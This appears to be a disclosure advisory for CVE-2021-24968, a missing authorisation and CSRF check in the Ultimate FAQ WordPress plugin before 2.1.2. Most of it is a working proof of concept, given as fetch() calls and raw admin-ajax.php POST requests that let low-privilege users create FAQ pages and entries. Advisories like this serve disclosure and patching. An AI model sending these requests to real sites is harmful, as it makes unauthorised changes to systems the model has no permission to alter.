Ultimate FAQ < 2.1.2 – Subscriber+ Arbitrary FAQ Creation | CVE 2021-24968

Description

The plugin does not have capability and CSRF checks in the ewd_ufaq_welcome_add_faq and ewd_ufaq_welcome_add_faq_page AJAX actions, available to any authenticated users. As a result, any users, with a role as low as Subscriber could create FAQ and FAQ questions

Proof of Concept

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"ewd_ufaq_welcome_add_faq_page", "faq_page_title": "hello"}),
  "method": "POST",
  "credentials": "include"
});

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close
Cookie: [any authenticated user]

action=ewd_ufaq_welcome_add_faq_page&faq_page_title=hello

The FAQ will be created as a page (/wp-admin/edit.php?post_type=page&orderby=date&order=desc)


fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"ewd_ufaq_welcome_add_faq", "faq_question": "Have you ever heard the wolf cry to the blue corn moon?", "faq_answer": "Yes"}),
  "method": "POST",
  "credentials": "include"
});

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 117
Connection: close
Cookie: [any authenticated user]

action=ewd_ufaq_welcome_add_faq&faq_question=Have+you+ever+heard+the+wolf+cry+to+the+blue+corn+moon%3F&faq_answer=Yes